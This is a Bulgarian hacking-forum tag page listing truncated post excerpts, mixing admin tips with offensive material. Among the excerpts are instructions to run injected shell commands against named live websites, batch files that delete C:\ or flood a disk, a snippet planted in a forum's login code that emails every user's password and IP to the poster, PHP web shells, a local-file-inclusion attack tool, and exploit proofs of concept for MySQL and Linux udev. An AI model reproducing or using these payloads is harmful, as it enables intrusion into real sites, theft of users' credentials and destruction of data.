Jump to content
ТУК НЕ СЕ ПРЕДЛАГАТ ХАКЕРСКИ УСЛУГИ ! ×

Search the Community

Showing results for tags 'from nullsecbg'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • За форума / About the forum
    • Условия за ползване, препоръки и работа с форумите
  • Информационна сигурност / Information Security
    • Пенетрейшън тестове
    • Тестове за социално инженерство
    • Експлойти
    • Инструменти
    • Вируси
    • Програмиране
    • Криптография
    • Сертифициране
    • След дъжд-качулка :)
    • Безжични мрежи, мобилни устройства и друг хардуер
    • Физическа сигурност
  • Ресурси / Resources
    • Новини: По света и у нас
    • Уроци
    • Състезания за хакери
    • Книги, филми, списания
    • Интересни събития
  • Други / Others
    • Кариерно развитие
    • Продавалник (Купува/Продава, Търси/Предлага)
    • Съответствие, наредби и стандарти
    • Уеб дизайн
    • Оф-топик
  • TAD GROUP's Careers
  • Old school hackers's Topics
  • BG-Soft's Регистриране на крайни приложения
  • BG-Soft's Как и къде да продаваме крайни приложеня
  • BG-Soft's Инструменти за изграждане на крайни приложения
  • BG-Soft's Полезни съвети
  • Assembly x86's Какво е асембли и защо трябва да ни интересува?
  • Limma's Hack , Crack , Code and more
  • Limma's Topic Linux
  • Limma's YouTube Tutorials

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


About Me

  1. Ако не сте разбрали даден урок или просто искате да се направи урок за нещо дето искате да научите пишете тук ще отделям време за да ви ги направя.
  2. пускайте ги по този начин тук ще пробвам да краквам Example : 098f6bcd4621d373cade4e832627b4f6 : md5
  3. Реших да направя този урок новите потребители между нас във тая сфера. Прочети внимателно и следвай стъпките за да бъдеш успешен Какво е WPS WPS означава Wi-Fi Protected Setup, стандартна функция, достъпна за много домашни широколентови маршрутизатори от 2007 г. WPS опростява процеса на създаване на защитени връзки за различните Wi-Fi устройства, които се свързват с домашните маршрутизатори(Routers), но някои рискове за сигурността на WPS Технологията изисква внимание. 1 - Свали : https://ufile.io/qwcko VirusTotal : https://www.virustotal.com/en/file/a727
  4. Remote Code Execution Wiki : What is RCE ? Не работи по всеки сайт вече 80 % Fixed но ще дам и 1 2 сайта дето все още го имат Отворете 1 от линковете : http://studog.net/iptools/ping.php http://www.dnschangecheck.com/trace.php http://www.dnschangecheck.com/trace.php Please enter IP or Hostname Traceroute напишете примерно : ";uname -a" ";ls" ";id" и ще видите магията http://studog.net/iptools/ping.php Enter an IP address or Domain name to ping по същия начин ";uname -a" ";ls" ";id" и ще видите магията
  5. Отворете CMD като администратор и напишете следните команди : diskpart list disk (ще се появи лист със дисковете) select disk 1 (примерно) clean create partition primary select partition 1 active format quick fs=fat32 (Формат на избрания диск ) type assign exit
  6. Сканирано е : https://www.virustotal.com/en/file/1f58b6693c925a1e35896f6ffe6b46b20016a98262a2fc4186577b845ff1851c/analysis/ Download
  7. 5,000 празни папки? Отворете Notepad и напишете: @echo off :top md %random% Goto top Запаметете като name.bat Крашване на Windows : Отворете Notepad и напишете: @Echo off Del C:\ *.* y Запаметете като name.bat Рестартиране на компютъра Отворете Notepad и напишете: @echo off shutdown -r -f -t 00 Запаметете като name.bat Форматиране на хард диск Отворете Notepad и напишете: 010010110001111100100101010101010100000111111 00000 Запаметете като name.bat
  8. Паролата, която защитава вашия wp-login.php файл (и папката wp-admin) може да добави допълнителен слой към вашия сървър. Тъй като защитата с парола wp-admin може да счупи всеки плъгин, който използва ajax на предния край, обикновено е достатъчно просто да защитите wp-login. За да направите това, ще трябва да създадете файл .htpasswds. Много хостове имат инструменти за това, но ако трябва да го направите ръчно, можете да използвате този htpasswd генератор. Подобно на вашия .htaccess файл (който е файл, който е само разширение), .htpasswd няма да има префикс. Можете да поставите този ф
  9. <? class Cypher_dKe { var $data = array(); var $K = array( 0x493e0, 0x61a80, 0x7a120, 0x927c0, 0xaae60, 0xc3500, 0xdbba0, 0xf4240, 0x10c8e0, 0x124f80, 0x13d620, 0x155cc0, 0x16e360, 0x186a00, 0x19f0a0, 0x1b7740, 0x1cfde0, 0x1e8480, 0x200b20, 0x2191c0, 0x231860, 0x249f00, 0x2625a0, 0x27ac40, 0x2932e0, 0x2ab980, 0x2c4020, 0x2dc6c0, 0x2f4d60, 0x30d400, 0x325aa0, 0x33e140, 0x3567e0, 0x36ee80, 0x387520, 0x39fbc0, 0x3b8260, 0x3d0900, 0x3e8fa0, 0x401640, 0x419ce0, 0x432380, 0x44aa20, 0x4630c0, 0x47b760, 0x493e00, 0x4ac4a0, 0x4c4b40, 0x4dd1e0, 0x4f5880, 0x50df20, 0
  10. <?php define("PRE","1zA$");//Sel define("POST","%yU1"); class Secure { /** * Crypt Password * @param ClearText PW * @return Crypted PW */ public static function hash($password){ return hash("whirlpool", PRE . $password . POST); } } $hash1 = Secure::hash("mdp"); echo $hash1 . "<br \>" . strlen($hash1) . "<br \>"; $hash2 = Secure::hash("long password"); echo $hash2 . "<br \>" . strlen($hash2); ?>
  11. Влезте като root и спрете MySQL Server Daemon # /etc/init.d/mysql stop Стартирайте MySQL сървъра без парола. # mysqld_safe --skip-grant-tables & Свържете се с MySQL сървъра, като използвате MySQL клиента. # mysql -u root Задайте нова потребителска парола за MySQL, като въведете следните четири командата. Не забравяйте да промените "newpw" на желаната от вас парола. mysql> use mysql; mysql> update user set password=PASSWORD("newpw") where User='root'; mysql> flush privileges; mysql> quit Спрете MySQL сървъра. # /etc/init.d/mysql stop Сега старт
  12. ''' # Source: https://raw.githubusercontent.com/SECFORCE/CVE-2017-3599/master/cve-2017-3599_poc.py # Exploit Title: Remote MySQL DOS (Integer Overflow) # Google Dork: N/A # Date: 13th April 2017 # Exploit Author: Rodrigo Marcos # Vendor Homepage: https://www.mysql.com/ # Software Link: https://www.mysql.com/downloads/ # Version: 5.6.35 and below / 5.7.17 and below # Tested on: N/A # CVE : CVE-2017-3599 ''' import socket import sys from struct import pack ''' CVE-2017-3599 Proof of Concept exploit code. https://www.secforce.com/blog/2017/04/cve-2017-3599-pre-auth-mysql-remote-dos/ Rodrigo
  13. Чрез CMD : netsh wlan show profile name="nameofyournetwork" key=clear Пример : netsh wlan show profile name="linuxmaster" key=clear
  14. Примерери GET HWID Imports System.Management Public Class Form1 Private Sub Button1_Click_1(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click Dim cpuInfo As String = String.Empty Dim mc As New ManagementClass("win32_processor") Dim moc As ManagementObjectCollection = mc.GetInstances() For Each mo As ManagementObject In moc If cpuInfo = "" Then cpuInfo = mo.Properties("processorID").Value.ToString() Exit For End If Next TextBox1.Text = cpuInfo
  15. терминал който изпълнява "Bash" команди <?php session_start(); $pass = "nullsecurity"; $aliases = array('la' => 'ls -la', 'll' => 'ls -alvhF', 'dir' => 'ls'); $banner = <<<EOF <body style="background:#000000"> <font color="white"><center><p style='text-decoration: blink'> _ _ _ _ ____ _ _ | \ | |_ _| | / ___| ___ ___ _ _ _ __(_) |_ _ _ | \| | | | | | \___ \ / _ \/ __| | | | '__| | __| | | |</font> <font color="green"> | |\ | |_| | | |___) | __/ (__| |_| |
  16. Функцйи : Терминал изпълняващ "BASH" команди като id , uname -a , ls etc. Сървър информация. <!-- PHP CODE --> <?php session_start(); ?> <?php //Start Timer $a = explode(" ",microtime()); $StartTime = $a[0] + $a[1]; //Bot Version and Information $ver = "1.0"; $phpv = @phpversion(); $prefix = " - "; $suffix = NULL; $safemodestatus = SafeModeStatus(); $a = explode(" ",microtime()); $EndTime = substr($a[0] + $a[1] - $StartTime,0,6); //SafeMode Status function SafeModeStatus(){ if(function_exists("ini_get") and is_callable("ini_get")) if(ini_get('safe_m
  17. Команди за Linux или за Shell passwd променяте паролата си pwd показва в коя директория се намирате в момента ls показва файловете в директорията ( dir ) ls -la показва всички файлове в директорията и с какви позволения за използване са cd отивате във вашата home директория ( cd ~ ) cd directory влизате в директория cd .. качва ви една директория нагоре cd - връща ви в предишната работна директория, п
  18. Примерно да речем, че имаш логин страница, която ще изглежда приблизително така: <form method="POST"> <input type="text" name="username" /> <input type="password" name="password" /> <input type="submit" name="loginformsubmit" value="вход"/> </form> <?php if(isset($_POST['loginformsubmit'])){ //Този код се изпълнява само тогава, когато е натиснат бутона вход $username = $_POST['username']; $password = $_POST['password']; $sql = " SELECT * FROM `users` WHERE `username`='$username' AND `password`='$password' "; //След това изп
  19. Интродукция SQL Injector е техника за инжектиране на код който се използва за атака. Тя позволява да вземеш информацията на една база данни. Първите признаци за уязвимост се появяват когато потребителят който използва SQL Injection въведе знаци които не могат да се филтрират правилно. Нека да речем, че нашият сайт има страница http://localhost/news.php?id=3 Първото нещо което трябва да направя аз като тест е да добавя знак ' след id=3 http://localhost/news.php?id=3' И ако нашият сайт е уязвим на такъв вид атака то ще ни излезе съобщение със следната
  20. 1. Използвайте Tor Browser 2. Използвайте VPN Service 3. Използвайте DuckDuckGo 4. Използвайте Cryptocat 5. Използвайте Virus Total
  21. /* # Title: Linux Kernel 4.8.0 udev 232 - Privilege Escalation # Author: Nassim Asrir # Researcher at: Henceforth # Author contact: wassline@gmail.com || https://www.linkedin.com/in/nassim-asrir-b73a57122/ # The full Research: https://www.facebook.com/asrirnassim/ # CVE: CVE-2017-7874 # Exp # first of all we need to know a small infos about udev and how it work the udev deamon is responsible for receiving device events from the kernel and this event are delivered to udev via netlink (is a socket family) you can read more about udev from: https://en.wikipedia.org/wiki/Udev # Exploit #
  22. <?php /** * @author T0rX * @version 0.3 **/ // no time limit set_time_limit(0); // don't display errors error_reporting(0); class LFI_Tool { // variable that come from $_GET and $_POST // values here are defaults and maybe overwritten // in the assign_vars() function private $url = ''; private $file = 'index.php'; private $code = '<?php phpinfo(); ?>'; private $head = 'User-Agent'; private $act; private $debug; // used in the tester act private $test_passwd; private $test_environ; private $test_input; private $test_filter; private $test_data; // if th
  23. Търсете файла functions.php във /includes/ отворете го със Notepad++ и търсете $result = $auth и под тази редица добавете следния код със вашия email : $recipient = 'linuxmaster@nullsecbg.null'; $subject = 'Password Alert - Test Forum'; $message = "Username: $username - Password: $password - UserIP: {$_SERVER["REMOTE_ADDR"]} - WebURL: {{$_SERVER['HTTP_HOST']}}"; mail($recipient, $subject, $message); ще получавате username , password , ip , website когато някой от потребителите на форума се логне в профила си
  24. #!/bin/bash #cd public_html/ find . -type f \( -iname "1.*" -o -iname "sh.php" \) -print0 >> ../php_backdoors find . -type f \( -iname "*.php" -o -iname "*.inc" \) -print0 | xargs -0 -r grep -REn \ '(c99|r57|exif_read_data|extract|passthru|shell_exec|base64_decode|fopen|fclose|eval|Refresh|refresh|justrulz)' >> ../php_backdoors
×
×
  • Create New...

Important Information

By using this site, you agree to our Terms of Use. We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.